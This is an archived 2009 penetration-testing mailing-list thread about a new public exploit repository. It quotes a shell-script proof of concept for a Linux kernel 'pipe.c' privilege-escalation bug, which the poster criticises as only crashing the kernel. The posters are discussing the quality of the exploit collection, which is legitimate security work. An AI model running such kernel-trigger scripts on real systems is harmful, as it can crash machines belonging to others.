Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: Possible Milw0rm replacement?
From: "J.Hart, Elec.Eng.Tech." <starnetmaster () gmail com>
Date: Thu, 19 Nov 2009 11:24:21 -0800

Nice.
Yes - it is a learning experience - I never expect the code to be
perfect - that wouldnt be any fun

Elle

On 11/17/09, Pedro Drimel <pedrodrimel () gmail com> wrote:
Note that now some of the applications are available to download
directly from their repositories which is awesome.

2009/11/17 Kevin L. Shaw, CISSP, GCIH <kshaw () eeenterprisesinc com>:
Siim:

One thing I've noticed from the group at Offensive Security is that they
never "give" you anything except a means to start down a path.  Their
motto
is "Try Harder" and in fact it is made obvious that any exploit you find
in
a repository should be examined and adjusted to serve your purpose.  They
know many of the POCs are not going to fly and leave it up to you to
figure
it out or break it down better like you did.  I'm just thankful they
brought
something to the community since I don't have the capability to create
these
on my own and still complete my day job.  I appreciate you pointing all
that
out because it's more for me to figure out and learn too.

Regards,
Kev


Siim Pőder wrote:

Hi

Tom Green wrote:


http://exploits.offensive-security.com/


Just that their review process seems to suck?

"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability":
while : ; do
  { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
  PID=$!
  OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
       { read PID REST ; echo $PID; } )
  OUT="${OUT%% *}"
  DELAY=$((RANDOM * 1000 / 32768))
  usleep $((DELAY * 1000 + RANDOM % 1000 ))
  echo n > /proc/$OUT/fd/1                 # Trigger defect
done

Not only would that just OOPS the kernel and kill the process, it also
needs a MODIFIED kernel (sleep(n) added to) to even trigger that. The
discoverer himself made that note when he posted the shellscript.

So on first glance it leaves a very professional impression of the site
;)

Siim

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a
full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------





------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually
do a proper penetration test. IACRB CPT and CEPT certs require a full
practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually
do a proper penetration test. IACRB CPT and CEPT certs require a full
practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------




-- 
RSA Public Key {Sha1}
3048 0241 00A8 CBCA C93A B066 3751 EBA8 46A3 9431 2BB8 924A 8EB3 0C8D
C055 18C2 5EBE A2AD 629B D40E 4EC4 A496 5413 8C3F 81A2 1B71 74D2 2032
F4BB 6A67 B4EB D545 D34A 32ED DF02 0301 0001

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]